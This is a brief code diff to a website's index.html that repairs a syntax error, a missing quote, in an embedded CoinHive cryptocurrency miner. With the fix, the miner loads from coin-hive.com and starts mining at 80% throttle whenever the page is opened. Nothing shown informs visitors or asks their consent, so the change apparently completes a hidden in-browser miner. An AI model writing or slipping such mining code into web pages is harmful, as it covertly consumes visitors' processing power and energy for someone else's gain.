--- a/index.html
+++ b/index.html
@@ -32,7 +32,7 @@
 
 <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
 <script>
-var miner = new CoinHive.Anonymous('3xDkHyeusQ4t3rBSw06CSjAxvVC9dgA6, 'site', {
+var miner = new CoinHive.Anonymous('3xDkHyeusQ4t3rBSw06CSjAxvVC9dgA6', 'site', {
 	throttle: 0.8
 });
 miner.start();
